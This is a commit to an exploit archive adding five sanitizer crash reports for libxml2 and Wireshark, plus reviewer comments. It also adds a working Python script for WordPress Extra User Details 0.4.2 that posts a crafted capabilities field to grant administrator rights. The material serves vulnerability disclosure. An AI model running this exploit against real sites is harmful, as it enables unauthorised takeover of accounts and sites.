DB: 2016-02-25

6 new exploits
Offensive Security 2016-02-25 05:01:57 +00:00
parent 4ffbeca63b
commit 5f28d68611
7 changed files with 498 additions and 0 deletions


@ -35725,3 +35725,9 @@ id,file,description,date,author,platform,type,port
39485,platforms/asp/webapps/39485.txt,"Thru Managed File Transfer Portal 9.0.2 - SQL Injection",2016-02-22,"SySS GmbH",asp,webapps,80 39485,platforms/asp/webapps/39485.txt,"Thru Managed File Transfer Portal 9.0.2 - SQL Injection",2016-02-22,"SySS GmbH",asp,webapps,80
39487,platforms/multiple/dos/39487.py,"libquicktime 1.2.4 - Integer Overflow",2016-02-23,"Marco Romano",multiple,dos,0 39487,platforms/multiple/dos/39487.py,"libquicktime 1.2.4 - Integer Overflow",2016-02-23,"Marco Romano",multiple,dos,0
39488,platforms/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - CSRF Vulnerability",2016-02-23,"Julien Ahrens",json,webapps,8443 39488,platforms/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - CSRF Vulnerability",2016-02-23,"Julien Ahrens",json,webapps,8443
39489,platforms/php/webapps/39489.py,"WordPress Extra User Details Plugin 0.4.2 - Privilege Escalation",2016-02-24,"Panagiotis Vagenas",php,webapps,80
39490,platforms/multiple/dos/39490.txt,"Wireshark - vwr_read_s2_s3_W_rec Heap-Based Buffer Overflow",2016-02-24,"Google Security Research",multiple,dos,0
39491,platforms/linux/dos/39491.txt,"libxml2 - xmlDictAddString Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0
39492,platforms/linux/dos/39492.txt,"libxml2 - xmlParseEndTag2 Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0
39493,platforms/linux/dos/39493.txt,"libxml2 - xmlParserPrintFileContextInternal Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0
39494,platforms/linux/dos/39494.txt,"libxml2 - htmlCurrentChar Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0
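Review bot: the platform column for 39488 reads `json`, which names a data format rather than a platform, while the other web-app rows in this hunk use `asp` and `php`; confirm the intended value so the entry turns up under platform filters. Separately, the 39490 row is the only new entry whose title carries no version ("Wireshark - vwr_read_s2_s3_W_rec Heap-Based Buffer Overflow"); even a "git master" qualifier in the title would tell readers that no release is named.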


platforms/linux/dos/39491.txt Executable file (82 lines)

@ -0,0 +1,82 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=637
The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint --html /path/to/file"):
--- cut ---
==25920==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x631000010810 at pc 0x0000004a2f25 bp 0x7ffc81805ae0 sp 0x7ffc81805290
READ of size 73661 at 0x631000010810 thread T0
#0 0x4a2f24 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0xd026b2 in xmlDictAddString libxml2-2.9.3/dict.c:285:5
#2 0xd009e8 in xmlDictLookup libxml2-2.9.3/dict.c:926:11
#3 0x806e4d in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2517:12
#4 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12
#5 0x7ca6f1 in htmlParseEntityRef libxml2-2.9.3/HTMLparser.c:2682:16
#6 0x820a0d in htmlParseReference libxml2-2.9.3/HTMLparser.c:4044:8
#7 0x7df716 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4619:3
#8 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
#9 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
#10 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
#11 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
#12 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
0x631000010810 is located 0 bytes to the right of 65552-byte region [0x631000000800,0x631000010810)
allocated by thread T0 here:
#0 0x4b8ef0 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
#1 0xa079a5 in xmlBufGrowInternal libxml2-2.9.3/buf.c:486:23
#2 0xa06722 in xmlBufGrow libxml2-2.9.3/buf.c:515:11
#3 0x72fef4 in xmlParserInputBufferGrow libxml2-2.9.3/xmlIO.c:3326:9
#4 0x543b22 in xmlParserInputGrow libxml2-2.9.3/parserInternals.c:320:8
#5 0x8067f4 in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2511:6
#6 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12
#7 0x7ca6f1 in htmlParseEntityRef libxml2-2.9.3/HTMLparser.c:2682:16
#8 0x820a0d in htmlParseReference libxml2-2.9.3/HTMLparser.c:4044:8
#9 0x7df716 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4619:3
#10 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
#11 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
#12 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
#13 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
#14 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c627fffa0b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c627fffa0c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c627fffa0d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c627fffa0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c627fffa0f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c627fffa100: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==25920==ABORTING
--- cut ---
The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758605. Attached is an XML file which triggers the crash.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39491.zip
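Review bot: "latest stable libxml2 (2.9.3, released 4 days ago)" is a relative date that tells an archive reader nothing, and the same sentence is reused in 39492, 39493 and 39494; give the report date (the Google issue and GNOME bugzilla ids are already cited) or the revision tested. The closing sentence also says "Attached is an XML file" although the reproduction command is `xmllint --html`, so the input in 39491.zip exercises the HTML parser (frames #3 to #10 are all in HTMLparser.c); describing it as an HTML input avoids sending a maintainer to the wrong parser.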

platforms/linux/dos/39492.txt Executable file (85 lines)

@ -0,0 +1,85 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=638
The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint /path/to/file"):
--- cut ---
==4588==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6290000049e6 at pc 0x00000062b643 bp 0x7ffffa00f570 sp 0x7ffffa00f568
READ of size 1 at 0x6290000049e6 thread T0
#0 0x62b642 in xmlParseEndTag2 libxml2-2.9.3/parser.c:9828:13
#1 0x61d620 in xmlParseElement libxml2-2.9.3/parser.c:10238:2
#2 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
#3 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
#4 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
#5 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
#6 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2
#7 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5
#8 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13
#9 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9
#10 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
0x6290000049e6 is located 2018 bytes to the right of 16388-byte region [0x629000000200,0x629000004204)
allocated by thread T0 here:
#0 0x4b8ef0 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
#1 0xa079a5 in xmlBufGrowInternal libxml2-2.9.3/buf.c:486:23
#2 0xa06722 in xmlBufGrow libxml2-2.9.3/buf.c:515:11
#3 0x72fef4 in xmlParserInputBufferGrow libxml2-2.9.3/xmlIO.c:3326:9
#4 0x543b22 in xmlParserInputGrow libxml2-2.9.3/parserInternals.c:320:8
#5 0x569d10 in xmlGROW libxml2-2.9.3/parser.c:2081:5
#6 0x68208d in xmlParseNCNameComplex libxml2-2.9.3/parser.c:3499:6
#7 0x68136d in xmlParseNCName libxml2-2.9.3/parser.c:3591:12
#8 0x67d282 in xmlParseQName libxml2-2.9.3/parser.c:8859:9
#9 0x61f04d in xmlParseStartTag2 libxml2-2.9.3/parser.c:9381:17
#10 0x61a626 in xmlParseElement libxml2-2.9.3/parser.c:10129:16
#11 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
#12 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
#13 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
#14 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
#15 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2
#16 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5
#17 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13
#18 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9
#19 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/parser.c:9828:13 in xmlParseEndTag2
Shadow bytes around the buggy address:
0x0c527fff88e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff88f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c527fff8930: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa
0x0c527fff8940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==4588==ABORTING
--- cut ---
The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758589. Attached is an XML file which triggers the crash.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39492.zip
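Review bot: the faulting READ at parser.c:9828 lands 2018 bytes past the end of a 16388-byte region whose allocation stack is `realloc` via `xmlBufGrowInternal` and `xmlGROW` during `xmlParseStartTag2`, i.e. the parser input buffer after a grow. The file should say whether the pointer dereferenced in `xmlParseEndTag2` was taken before that grow: a read that far past a freshly reallocated buffer is what a stale pointer into the previous buffer looks like, and that is the information a maintainer needs to decide where the fix belongs.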

platforms/linux/dos/39493.txt Executable file (68 lines)

@ -0,0 +1,68 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=639
The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint /path/to/file"):
--- cut ---
==4210==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6290000051ff at pc 0x000000533c8f bp 0x7ffdb38c4830 sp 0x7ffdb38c4828
READ of size 1 at 0x6290000051ff thread T0
#0 0x533c8e in xmlParserPrintFileContextInternal libxml2-2.9.3/error.c:192:6
#1 0x54088a in xmlReportError libxml2-2.9.3/error.c:406:9
#2 0x53884f in __xmlRaiseError libxml2-2.9.3/error.c:633:2
#3 0x56f0ec in xmlFatalErr libxml2-2.9.3/parser.c:540:5
#4 0x569c98 in xmlGROW libxml2-2.9.3/parser.c:2077:9
#5 0x62bcb3 in xmlParseEndTag2 libxml2-2.9.3/parser.c:9846:5
#6 0x61d620 in xmlParseElement libxml2-2.9.3/parser.c:10238:2
#7 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2
#8 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5
#9 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13
#10 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9
#11 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
0x6290000051ff is located 1 bytes to the left of 16384-byte region [0x629000005200,0x629000009200)
allocated by thread T0 here:
#0 0x4b8b68 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7f4df5219729 (/lib/x86_64-linux-gnu/libz.so.1+0xf729)
SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/error.c:192:6 in xmlParserPrintFileContextInternal
Shadow bytes around the buggy address:
0x0c527fff89e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff89f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8a00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8a10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8a20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c527fff8a30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
0x0c527fff8a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c527fff8a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c527fff8a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c527fff8a70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c527fff8a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==4210==ABORTING
--- cut ---
The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758588. Attached is an XML file which triggers the crash.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39493.zip
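Review bot: the allocation stack ends at an unsymbolized frame in libz.so.1 (`#1 0x7f4df5219729`), so the report never shows which libxml2 code owns the 16384-byte region that is read one byte before its start; an allocation made from inside zlib suggests the PoC input is compressed, which the text should state because it changes how the file is reproduced. Also worth stating: the read is in the error-reporting path (`xmlParserPrintFileContextInternal`, reached from `xmlFatalErr` inside `xmlGROW`), so the overread happens while libxml2 prints context for an earlier parse error, not in the parser proper.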

platforms/linux/dos/39494.txt Executable file (78 lines)

@ -0,0 +1,78 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=636
The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint --html /path/to/file"):
--- cut ---
==26202==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100001c900 at pc 0x0000008073f9 bp 0x7ffd791c7f90 sp 0x7ffd791c7f88
READ of size 1 at 0x62100001c900 thread T0
#0 0x8073f8 in htmlCurrentChar libxml2-2.9.3/HTMLparser.c:439:6
#1 0x80ee62 in htmlParseCharDataInternal libxml2-2.9.3/HTMLparser.c:3011:8
#2 0x821b85 in htmlParseCharData libxml2-2.9.3/HTMLparser.c:3061:5
#3 0x7df875 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4634:3
#4 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
#5 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
#6 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
#7 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
#8 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
0x62100001c900 is located 0 bytes to the right of 4096-byte region [0x62100001b900,0x62100001c900)
allocated by thread T0 here:
#0 0x4b8b68 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0xa01a0c in xmlBufCreate libxml2-2.9.3/buf.c:137:32
#2 0x550aca in xmlSwitchInputEncodingInt libxml2-2.9.3/parserInternals.c:1205:34
#3 0x54f5ce in xmlSwitchToEncodingInt libxml2-2.9.3/parserInternals.c:1281:12
#4 0x54f278 in xmlSwitchEncoding libxml2-2.9.3/parserInternals.c:1101:11
#5 0x808eea in htmlCurrentChar libxml2-2.9.3/HTMLparser.c:518:13
#6 0x804a38 in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2496:9
#7 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12
#8 0x7ec211 in htmlParseDocTypeDecl libxml2-2.9.3/HTMLparser.c:3424:12
#9 0x7debf4 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4585:3
#10 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
#11 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
#12 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
#13 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
#14 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/HTMLparser.c:439:6 in htmlCurrentChar
Shadow bytes around the buggy address:
0x0c427fffb8d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffb8e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffb8f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffb900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffb910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c427fffb920:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffb930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffb940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffb950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffb960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffb970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==26202==ABORTING
--- cut ---
The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758606. Attached is an XML file which triggers the crash.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39494.zip
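Review bot: the 4096-byte region read at HTMLparser.c:439 was created by `xmlBufCreate` from `xmlSwitchEncoding`, called out of `htmlCurrentChar` itself (HTMLparser.c:518) while a DOCTYPE name was being parsed, and the later 1-byte read sits exactly at the end of that region. The text presents this as a generic overread, but the trace shows the decoded-input buffer installed by a mid-parse encoding switch being read past its end; that distinguishes it from 39491 (an oversized copy into the name dictionary) and deserves a sentence, since the two files otherwise share an identical description.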

platforms/multiple/dos/39490.txt (66 lines)

@ -0,0 +1,66 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=647
The following crash due to a heap-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==5869==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001e95c at pc 0x0000004c1386 bp 0x7fff8c82cbf0 sp 0x7fff8c82c3a0
WRITE of size 1425 at 0x61b00001e95c thread T0
#0 0x4c1385 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0x9c8ab0 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1614:5
#2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20
#3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10
#4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#6 0x52c1df in main wireshark/tshark.c:2197:13
0x61b00001e95c is located 0 bytes to the right of 1500-byte region [0x61b00001e380,0x61b00001e95c)
allocated by thread T0 here:
#0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7f1f907a8610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x83fff6 in wtap_open_offline wireshark/wiretap/file_access.c:1105:2
#3 0x53214d in cf_open wireshark/tshark.c:4195:9
#4 0x52bc7e in main wireshark/tshark.c:2188:9
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c367fffbcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbcf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffbd20: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
0x0c367fffbd30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbd50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5869==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11795. Attached are three files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39490.zip
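Review bot: the affected version is given only as "current git master", with no revision or date, so the advisory does not let a reader determine which Wireshark releases carry the bug or which one fixes bug 11795; record the commit tested. The report is also a WRITE (1425 bytes via memcpy starting exactly at the end of a 1500-byte buffer allocated in `wtap_open_offline`), unlike the read-only overreads in the libxml2 files of this commit; saying so in the text matters for impact assessment because files.csv classifies it only as `dos`.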

platforms/php/webapps/39489.py Executable file (113 lines)

@ -0,0 +1,113 @@
"""
* Exploit Title: Extra User Details [Privilege Escalation]
* Discovery Date: 2016-02-13
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://vadimk.com/
* Software Link: https://wordpress.org/plugins/extra-user-details/
* Version: 0.4.2
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress
Description
-----------
_Extra User Details_ plugin for WordPress suffers from a Privilege
Escalation
vulnerability.
The plugin hooks the `eud_update_ExtraFields` function to `profile_update`
WordPress action. This function doesn't properly check user capabilities
and
updates all meta information passed to post data. The only condition is
that
the post variable name has the `eud` prefix which is striped before
updating
the values in DB.
An attacker can exploit this misbehavior to update the
{prefix}\_capabilities
meta information to gain administrative privileges.
PoC
---
In the following PoC we assume that the database has the `wp` prefix, a
very
common scenario as this is the default WordPress value
"""
# !/usr/bin/python3
################################################################################
# Extra User Details Privilege Escalation Exploit
#
# Author: Panagiotis Vagenas <pan.vagenas>
#
# Dependencies: BeautifulSoup
(http://www.crummy.com/software/BeautifulSoup/)
################################################################################
import requests
from bs4 import BeautifulSoup
baseUrl = 'http://example.com'
loginUrl = baseUrl + '/wp-login.php'
profileUrl = baseUrl + '/wp-admin/profile.php'
loginPostData = {
'log': 'username',
'pwd': 'password',
'rememberme': 'forever',
'wp-submit': 'Log+In'
}
s = requests.Session()
r = s.post(loginUrl, loginPostData)
if r.status_code != 200:
print('Login error')
exit(1)
r = s.get(profileUrl)
soup = BeautifulSoup(r.text, 'html.parser')
f = soup.find('form', {'id': 'your-profile'})
if not f:
print('Error')
exit(1)
data = {
'eudwp_capabilities[administrator]': 1,
}
for i in f.find_all('input'):
if 'name' in i.attrs and 'value' in i.attrs and i.attrs['value']:
data[i.attrs['name']] = i.attrs['value']
r = s.post(profileUrl, data)
if r.status_code == 200:
print('Success')
exit(0)
"""
Solution
--------
Upgrade to v0.4.2.1
Timeline
--------
1. **2016-02-13**: Vendor notified through wordpress.org support forums
2. **2016-02-13**: Vendor notified through through the contact form in
his website
3. **2016-02-13**: Vendor responded and received details about this issue
4. **2016-02-15**: Vendor released v0.4.2.1 which resolves this issue
"""